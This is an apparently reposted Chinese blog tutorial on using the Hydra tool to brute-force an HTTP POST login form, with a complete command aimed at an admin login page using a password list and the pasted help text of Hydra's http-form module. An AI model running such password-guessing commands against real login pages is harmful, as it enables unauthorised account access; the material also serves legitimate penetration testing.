您现在的位置是: 首页  >  网络运营


程序员文章站 2024-01-19 12:15:22
这里说的是 post 类型的。。      [root@fedora ~]# hydra -f -l sincoder -P /root/1.txt -V...
这里说的是 post 类型的。。



[root@fedora ~]# hydra -f -l sincoder -P /root/1.txt -V -s 9900 http-post-form "/admin/index.php?action=login:user=^USER^&pw=^PASS^:<title>登录</title>"


主要看后面 。。


/index.php ..这个是登录的 url


后门是POST的数据 其中的用户名密码使用 ^USER^ ^PASS^ 来代替


然后是如果登录出错 会出现的字符 。。。










[root@fedora ~]# hydra -U http-form

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only


Hydra (http://www.thc.org/thc-hydra) starting at 2012-11-25 19:25:02


Help for module http-form:


Module http-form requires the page and the parameters for the web form.


By default this module is configured to follow a maximum of 5 redirections in

a row. It always gathers a new cookie from the same URL without variables

The parameters take three ":" separated values, plus optional values.


Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]

First is the page on the server to GET or POST to (URL).

Second is the POST/GET variables (taken from either the browser, proxy, etc.

 with usernames and passwords being replaced in the "^USER^" and "^PASS^"

 placeholders (FORM PARAMETERS) www.2cto.com

Third is the string that it checks for an *invalid* login (by default)

 Invalid condition login check can be preceded by "F=", successful condition

 login check must be preceded by "S=".

 This is where most people get it wrong. You have to check the webapp what a

 failed string looks like and put it in this parameter!

The following parameters are optional:

 C=/page/uri     to define a different page to gather initial cookies from

 H=My-Hdr: foo   to send a user defined HTTP header with each request





 "/login:user=^USER&pass=^PASS:failed:H=Authorization: Basic dT1w:H=X-Foo: Bar"


[root@fedora ~]#